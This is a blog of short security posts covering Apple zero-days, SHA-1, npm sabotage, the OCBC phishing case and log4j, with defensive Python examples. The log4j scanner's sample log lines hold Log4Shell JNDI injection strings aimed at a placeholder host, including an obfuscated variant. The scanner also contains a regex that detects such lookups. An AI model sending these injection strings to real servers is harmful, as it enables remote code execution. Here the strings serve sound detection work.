Categories
security

“Apple patches 17th zero-day of 2023”

Some people are alarmed when they read headlines like this one. They may wonder why Apple’s devices seem to be plagued by so many “security issues.” In fact, if you compare the number of CVEs (in layman’s terms, publicly catalogued security bugs) reported for Apple iOS versus Android, you will find that Android fares much worse.

Google » Android : Vulnerability Statistics
Apple » Iphone Os : Vulnerability Statistics

Android has 429 vulnerabilities reported for 2023 as of today, compared to 38 for Apple iOS – more than ten times as many.

The reality is that all complex software is prone to bugs, and these bugs may or may not be exploitable. Further complicating the issue is that software is not a monolith; rather, it’s composed of numerous parts that are constantly changing due to upgrades, bug fixes, and other developments.

I’ve often said that maintaining running software is like paying a tax, even if “the specs are frozen” and “nothing is changed.” The fact is, things are constantly changing in the software world. New vulnerabilities are discovered in code or libraries, operating system updates roll out regularly, and the threat landscape evolves continuously.

So, why does it seem like Apple is frequently in the spotlight when it comes to security vulnerabilities? There are several reasons for this perception:

  • Popularity and Visibility: Apple’s products, especially iPhones and Macs, are immensely popular worldwide. With a large user base, any security issue that does arise tends to receive significant media attention.
  • Intensive Scrutiny: Apple’s closed ecosystem and stringent control over its hardware and software mean that security researchers and hackers alike often target the company’s products. The more scrutiny a system undergoes, the more vulnerabilities are likely to be discovered.
  • Responsiveness: Apple takes security seriously and is quick to release patches and updates to address vulnerabilities when they are discovered. While this is a proactive approach, it also means that security issues might come to light more frequently.
  • Zero-Day Vulnerabilities: Some vulnerabilities become publicly known, or are exploited, before the vendor has a fix available; these are termed “zero-day vulnerabilities.” They turn up in all kinds of software, including Apple’s. However, Apple’s high-profile status means that these vulnerabilities gain significant attention.
  • User Expectations: Users of Apple products often have high expectations when it comes to security. Any perceived lapse or vulnerability can generate headlines and discussions.

In reality, all major operating systems, including iOS, Android, Windows, and macOS, face security challenges. The key is how these companies respond to these challenges and their ability to provide timely security updates to protect their users.

To stay safe in the digital age, it’s crucial to keep your devices and software up to date with the latest security patches. Additionally, practicing good cybersecurity habits, such as using strong, unique passwords, enabling two-factor authentication, and being cautious about the apps you download and the websites you visit, can go a long way in protecting your digital life. As technology continues to advance, so do the efforts of those seeking to exploit it. By staying informed and taking proactive security measures, we can all play a role in mitigating the risks associated with our ever-evolving digital landscape.

Source: Apple patches 17th zero-day of 2023

Categories
cloud network security

Tailscale

When I first heard about Tailscale, I didn’t “get” it. I read that it is like a VPN but not quite the same as a traditional VPN, but I didn’t know the details. Since there were a lot of rave reviews from HN users, I got curious. After trying it out, I was immediately sold. I have now installed it on all my personal devices.

Tailscale is a revolutionary new way of connecting devices together. Once set up – and it’s very easy to set up – your devices behave as if they are on the same network. No complicated VPN to set up, no persistent connection issues, and no IP addresses to remember in order to reach your devices. It just works.

Tailscale is to VPNs what Dropbox is to file synchronization.

Tailscale offers a wide range of benefits for businesses and individuals alike. One key benefit is that it lets users reach their networks and devices without traditional VPN software: they can connect from any device, including smartphones, tablets, and laptops, with no software or configuration beyond the Tailscale client itself. This makes it extremely convenient for users who need to reach their networks and devices while on the go.

Another benefit of Tailscale is its security. Tailscale encrypts all traffic between devices, so data transmitted over the network is protected from eavesdropping and tampering. This makes it well suited to businesses and organizations that handle sensitive data and need to keep it protected at all times.

The best part is that Tailscale is extremely easy to use. It has a simple and intuitive user interface that lets users of all skill levels set it up and use it.

I highly recommend trying it out just to see how it works. Tailscale is free for personal use.

Categories
programming security

NIST Retires SHA-1 Cryptographic Algorithm | NIST

NIST, the US standards body responsible for cybersecurity standards, is recommending that SHA-1 be phased out because of weaknesses in the algorithm and the growing feasibility of attacks using powerful hardware. Modern browsers have already dropped support for SHA-1. However, older applications may still be using it as a checksum.

The venerable cryptographic hash function has vulnerabilities that make its further use inadvisable.

Source: NIST Retires SHA-1 Cryptographic Algorithm | NIST
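The post notes that older applications may still rely on SHA-1 as a checksum. The following is an added example, not code from NIST or from the original post, of a checksum verifier that refuses retired algorithms by default and a helper that migrates a legacy manifest to SHA-256. The manifest format (name, algorithm, hex digest) and the sample input `b"abc"` are assumptions made for the illustration; the digests are the standard test vectors for that input.

```python
import hashlib
import hmac

# Algorithms this verifier accepts. SHA-1 and MD5 are recognised only so that
# legacy manifests can be identified and migrated; they are rejected by default.
APPROVED = {"sha256", "sha384", "sha512"}
DEPRECATED = {"sha1", "md5"}


def verify_checksum(data: bytes, algorithm: str, expected_hex: str,
                    allow_deprecated: bool = False):
    """Verify data against a hex digest.

    Returns (ok, message). The comparison is constant-time so the check itself
    does not leak how many leading hex digits matched.
    """
    algorithm = algorithm.lower()
    if algorithm in DEPRECATED and not allow_deprecated:
        return False, f"{algorithm} is retired: re-publish this checksum with SHA-256 or stronger"
    if algorithm not in APPROVED | DEPRECATED:
        return False, f"unsupported algorithm: {algorithm}"
    actual = hashlib.new(algorithm, data).hexdigest()
    if hmac.compare_digest(actual, expected_hex.lower()):
        return True, "checksum matches"
    return False, "checksum mismatch"


def migrate_manifest(entries, data_by_name, new_algorithm="sha256"):
    """Rewrite legacy (name, algorithm, hexdigest) entries to new_algorithm.

    Each legacy entry is first verified under its old algorithm so that only
    bytes the publisher actually vouched for are re-hashed; anything that fails
    is dropped rather than silently re-published under a strong hash.
    """
    migrated = []
    for name, algorithm, expected_hex in entries:
        data = data_by_name[name]
        ok, _ = verify_checksum(data, algorithm, expected_hex, allow_deprecated=True)
        if not ok:
            continue
        if algorithm.lower() in DEPRECATED:
            expected_hex = hashlib.new(new_algorithm, data).hexdigest()
            algorithm = new_algorithm
        migrated.append((name, algorithm, expected_hex))
    return migrated


# Constructed sample: the standard test vectors for the input b"abc".
SHA1_ABC = "a9993e364706816aba3e25717850c26c9cd0d89d"
SHA256_ABC = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"

if __name__ == "__main__":
    print(verify_checksum(b"abc", "sha1", SHA1_ABC))      # rejected: sha1 is retired
    print(verify_checksum(b"abc", "sha256", SHA256_ABC))  # accepted
    print(migrate_manifest([("abc.txt", "sha1", SHA1_ABC)], {"abc.txt": b"abc"}))
```

A checksum only proves the bytes match what the publisher hashed; if the digest list itself is fetched over an unauthenticated channel, a stronger hash does not help. Migrating the manifest is worthwhile precisely because SHA-1 collisions are now practical, so two different files can share a SHA-1 digest while their SHA-256 digests differ.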

Categories
cloud security sysadmin

New for Amazon GuardDuty – Malware Detection for Amazon EBS Volumes | AWS News Blog

Once configured, Amazon GuardDuty will scan EBS volumes for malware and report its findings when it detects suspicious activity. If you haven’t enabled it already, you should do so.

https://aws.amazon.com/blogs/aws/new-for-amazon-guardduty-malware-detection-for-amazon-ebs-volumes/

When you have GuardDuty Malware Protection enabled, a malware scan is initiated when GuardDuty detects that one of your EC2 instances or container workloads running on EC2 is doing something suspicious.

Categories
security

Security Certification Roadmap – Paul Jerimy Media

It’s probably impossible to get every security certification out there. But it’s still fun to see them being listed and classified neatly like this.

IT Security Certification Roadmap charting security implementation, architecture, management, analysis, offensive, and defensive operation certifications.

Source: Security Certification Roadmap – Paul Jerimy Media

Categories
phishing security

Lupinia Studios – I’m a Scam Prevention Expert, and I Got Scammed

There’s a lot to unpack here: a scam prevention expert gets scammed because the supposed fraud prevention department turns out to be the actual fraud. It goes to show that anyone can fall for these attacks, even experts.


Source: Lupinia Studios – I’m a Scam Prevention Expert, and I Got Scammed

Categories
programming security

BIG sabotage: Famous npm package deletes files to protest Ukraine war

Oh dear. Yet another npm author has gone rogue. This time the npm package deletes files for users with Russian or Belarusian IP addresses. Time to take package pinning more seriously.

This week, the developer of the popular npm package ‘node-ipc’ released sabotaged versions of the library in protest of the ongoing Russo-Ukrainian War. The ‘node-ipc’ package, which gets downloaded over a million times weekly, began deleting files on developers’ machines, in addition to creating new text files with “peace” messages.

Source: BIG sabotage: Famous npm package deletes files to protest Ukraine war

Categories
privacy security

OCBC phishing scam – how it could have happened

Disclaimer: The following analysis of what could have happened is pure speculation based on publicly available information.

On 8 Jan 2022, news broke that as many as 469 OCBC bank customers had been affected by phishing scams, racking up losses of up to S$8.5 million in total. This must be one of the biggest and most successful phishing attacks against a Singapore bank in recent memory.

Based on details in the news reports, it appears that the scam worked mainly as a result of two factors:
1. Successful social engineering
2. Possible SMS hijacking

Fake bank SMS

According to reports, the users who got scammed received SMS messages that appeared to originate from the bank. Scammers prey on users’ tendency to trust messages that appear alongside previous legitimate SMSes. They achieve this by using an SMS feature known as alphanumeric sender ID: the sender can choose the sender ID string, so they simply pick the one the bank uses. In this case, they chose “OCBC” as the sender ID. When a user receives such an SMS, it appears in the same thread as existing SMSes from the sender ID “OCBC”.

As a quick test, I sent myself a message with the sender ID set to “BOC SG” (what Bank of China Singapore uses), and this is what I see:

This is just to show how easy it is to fake a sender ID. Interestingly, I was unable to reproduce this using “OCBC” as the sender ID, probably because the service provider or ISP is filtering out such IDs.

If a user believes the message is legitimately from the bank, they tend to let their guard down and click on the link that the “bank” has sent – especially if it is worded as something urgent. In this case it directs them to a phishing site that looks exactly like the bank’s login page. Once the user enters their username and password, the scammer has captured their login credentials.

SMS hijacking

Having the login credentials alone is insufficient to make the attack successful, because most banks require 2FA for a full login and for more sensitive actions such as money transfers. This is where SMS hijacking comes in.

It has been known for quite some time that SMS is NOT a reliable form of 2FA. To understand why, we have to dig into how SMS is implemented. Those who are interested can find out more here. There are some sites – which I won’t link to – that offer such a hijacking service for as little as $16.

To cut a long story short, if an attacker knows your mobile phone number, they can intercept your SMS messages without you knowing. Shocking, I know. But this is well known and has been repeatedly demonstrated at cybersecurity conferences and in other public forums.

With both the login credentials and the hijacked SMS messages carrying the OTPs, an attacker can in theory carry out transactions without the user being notified.

That is not all: if the bank calls your mobile number – for example, to verify the transaction – that call can be intercepted as well via the same mechanism.

Closing the gap

The attack worked in this case because Singapore allows alphanumeric sender IDs without requiring pre-registration by the sending organization. There are now renewed calls to make pre-registration compulsory for using this feature.
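To make the pre-registration proposal concrete, here is an added example (not part of the original post, and not any telco’s or aggregator’s actual code) of the check an SMS gateway would apply at submission time: an alphanumeric sender ID is delivered only if the submitting account has registered that exact string, and look-alike IDs for someone else’s registered name are rejected. The registry contents, account names and sample messages are constructed placeholders; the confusable-character map is a small assumed set, not a complete one.

```python
from dataclasses import dataclass

# Constructed registry for the illustration: which alphanumeric sender IDs each
# sending organisation's account has pre-registered. Account names are placeholders.
REGISTRY = {
    "acct-ocbc": {"OCBC"},
    "acct-boc": {"BOC SG"},
}

# Digits commonly substituted to build look-alike IDs (assumed small set).
CONFUSABLES = str.maketrans({"0": "O", "1": "I", "5": "S", "8": "B"})


@dataclass
class SmsSubmission:
    account: str    # API account submitting the message to the gateway
    sender_id: str  # requested sender ID: a phone number or a free-form string
    body: str


def is_alphanumeric(sender_id: str) -> bool:
    """Plain phone numbers (digits with an optional leading +) are not alphanumeric IDs."""
    return not sender_id.lstrip("+").isdigit()


def canonical(sender_id: str) -> str:
    """Normalise case, spacing and confusable digits so look-alikes collide."""
    return "".join(sender_id.upper().split()).translate(CONFUSABLES)


def gateway_decision(sub: SmsSubmission, registry=REGISTRY):
    """Decide whether the gateway should deliver the message under the requested ID.

    Returns ("accept", reason) or ("reject", reason).
    """
    if not is_alphanumeric(sub.sender_id):
        return "accept", "numeric sender ID"
    own = registry.get(sub.account, set())
    if sub.sender_id in own:
        return "accept", "sender ID registered to this account"
    wanted = canonical(sub.sender_id)
    for account, ids in registry.items():
        if account == sub.account:
            continue
        for registered in ids:
            if canonical(registered) == wanted:
                return "reject", f"'{sub.sender_id}' impersonates '{registered}' registered to {account}"
    return "reject", "unregistered alphanumeric sender ID"


if __name__ == "__main__":
    samples = [
        SmsSubmission("acct-ocbc", "OCBC", "test message"),
        SmsSubmission("acct-reseller", "OCBC", "test message"),
        SmsSubmission("acct-reseller", "0CBC", "test message"),
        SmsSubmission("acct-reseller", "PR1ZE", "test message"),
        SmsSubmission("acct-reseller", "+6512345678", "test message"),
    ]
    for s in samples:
        print(f"{s.account:14} {s.sender_id:12} -> {gateway_decision(s)}")
```

The check only helps if every gateway that can terminate SMS into the country applies it, which is why the post frames the fix as a regulatory requirement rather than something one bank can do alone. Exact-string matching for the account’s own IDs is deliberate: a bank that registered “OCBC” should not be able to send as “0CBC” either, since that would train customers to accept look-alikes.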

Fixing SMS hijacking – if that is indeed the mechanism used – will take more effort and will probably require all ISPs to put mitigations in place in their systems. The easier fix may be to deprecate SMS as a 2FA option and stick to more secure options such as authenticating through an app or a physical token.

There are also questions as to why the automatic fraud detection that banks usually have in place did not work in this case. I shall not speculate on this but wait for further information from the investigation.

Conclusion

OCBC customers are not the first to fall prey to scams, and neither will they be the last. As we move more and more to the digital world we can expect cyber criminals to keep exploiting both technical loopholes and human weaknesses to achieve their objectives. User education remains important, and so does improving processes and closing technology gaps.

Categories
bug programming security

Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps

Previously we had attackers using hijacked npm libraries to steal credentials. In this case neither the libraries nor the maintainer was compromised. In fact it was the maintainer himself who deliberately introduced bugs into his libraries, thereby breaking thousands of apps that depend on them. There’s no easy solution to this dependency problem. For now, use pinned versions and manually approve upgrades.

Users of popular open-source libraries ‘colors’ and ‘faker’ were left stunned after they saw their applications, using these libraries, printing gibberish data and breaking. Some surmised that the NPM libraries had been compromised, but it turns out there’s more to the story.

Source: Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps
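Both this post and the ‘node-ipc’ one above end with the same advice: pin versions and approve upgrades by hand. As an added example (not code from either article or from npm itself), the script below audits a `package.json` for direct dependencies that are not pinned to an exact version, and rewrites ranged specs to the version the `package-lock.json` already resolved. The sample manifest and lockfile fragment are constructed; the package names and version numbers are placeholders, not real releases. The lockfile layout assumed is the `packages` map keyed by `node_modules/<name>` used by lockfile version 2 and later.

```python
import json
import re

# Exact semantic version: MAJOR.MINOR.PATCH with optional pre-release/build suffixes.
_EXACT_VERSION = re.compile(
    r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$"
)

SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def is_pinned(spec: str) -> bool:
    """True only for an exact version: '^', '~', ranges, 'latest', '*' and URLs all fail."""
    return _EXACT_VERSION.match(spec.strip()) is not None


def find_unpinned(package_json_text: str):
    """Return {name: spec} for every direct dependency that is not an exact version."""
    manifest = json.loads(package_json_text)
    unpinned = {}
    for section in SECTIONS:
        for name, spec in manifest.get(section, {}).items():
            if not is_pinned(spec):
                unpinned[name] = spec
    return unpinned


def pin_to_lockfile(package_json_text: str, lockfile_text: str) -> str:
    """Rewrite ranged specs to the exact version recorded in package-lock.json.

    Only direct dependencies are touched; the result is a new package.json whose
    specs match what the lockfile already resolved, so nothing changes on install.
    """
    manifest = json.loads(package_json_text)
    resolved = json.loads(lockfile_text).get("packages", {})
    for section in SECTIONS:
        for name, spec in manifest.get(section, {}).items():
            entry = resolved.get(f"node_modules/{name}")
            if entry and not is_pinned(spec) and is_pinned(entry.get("version", "")):
                manifest[section][name] = entry["version"]
    return json.dumps(manifest, indent=2)


# Constructed sample manifest and lockfile fragment (placeholder names and versions).
SAMPLE_PACKAGE_JSON = """{
  "name": "example-app",
  "dependencies": {
    "lib-alpha": "^1.4.0",
    "lib-beta": "~5.5.3",
    "lib-gamma": "9.2.1",
    "lib-delta": "latest"
  },
  "devDependencies": {
    "tool-eta": "*"
  }
}"""

SAMPLE_LOCKFILE = """{
  "name": "example-app",
  "lockfileVersion": 2,
  "packages": {
    "node_modules/lib-alpha": {"version": "1.4.2"},
    "node_modules/lib-beta": {"version": "5.5.3"},
    "node_modules/lib-gamma": {"version": "9.2.1"},
    "node_modules/lib-delta": {"version": "2.0.0"},
    "node_modules/tool-eta": {"version": "3.1.0"}
  }
}"""

if __name__ == "__main__":
    for name, spec in find_unpinned(SAMPLE_PACKAGE_JSON).items():
        print(f"unpinned: {name} {spec}")
    print(pin_to_lockfile(SAMPLE_PACKAGE_JSON, SAMPLE_LOCKFILE))
```

Pinning direct dependencies does not by itself pin the transitive tree, which is where a sabotaged release usually arrives. The complete practice is to commit the lockfile and install with `npm ci`, which fails rather than resolving anew when the lockfile and manifest disagree, and then to update the lockfile only through a reviewed change.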

Categories
programming security

RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec

log4j is a common logging library for Java applications. This vulnerability is extremely easy to exploit and allows an attacker to run arbitrary code on the server. IOW, very bad. For now, set log4j.formatMsgNoLookups=true to mitigate the issue until an official patch is out.

Given how ubiquitous this library is, the impact of this vulnerability is quite severe. Learn how to patch it, why it’s bad, and more in this post.

Source: RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec
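The vulnerability is triggered by log4j resolving `${jndi:...}` lookup strings that appear in logged input, so one immediate defensive step, alongside the mitigation above, is to search existing logs for that pattern to find out whether a server has already been probed. Here is an added example of that triage check (not code from LunaSec or the log4j project): it unwraps the `${lower:...}`/`${upper:...}` nesting that trivially defeats a literal search, then flags lines that contain a JNDI lookup. The access-log lines are constructed samples, and the set of nested lookups handled is deliberately small, so treat this as a first pass rather than a complete detector.

```python
import re

# Nested case-conversion lookups that can be wrapped around the keyword; the
# check resolves these from the inside out before matching.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def unwrap_lookups(text: str) -> str:
    """Resolve ${lower:x} / ${upper:x} repeatedly until nothing changes."""
    def resolve(match):
        inner = match.group(2)
        return inner.lower() if match.group(1).lower() == "lower" else inner.upper()

    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(resolve, text)
    return text


def has_jndi_lookup(line: str) -> bool:
    """True if the line carries a JNDI lookup string once nesting is unwrapped."""
    return _JNDI_LOOKUP.search(unwrap_lookups(line)) is not None


def scan_log(log_text: str):
    """Return (line_number, line) for every line that should be investigated."""
    return [(number, line) for number, line in enumerate(log_text.splitlines(), 1)
            if has_jndi_lookup(line)]


# Constructed sample lines in a web access-log style (not from any real system).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.7 - - [10/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:J}ndi:rmi://example.invalid/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"
10.0.0.8 - - [10/Dec/2021:10:01:11 +0000] "GET /price?amount=${100} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, line in scan_log(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

A hit means the server was sent a lookup string, not that the lookup succeeded; confirming impact needs the application’s own log4j output and outbound connection records from around the same time. Because the pattern can be obfuscated in more ways than this unwraps, the search is a way to prioritise investigation, not a substitute for applying the mitigation and upgrading log4j.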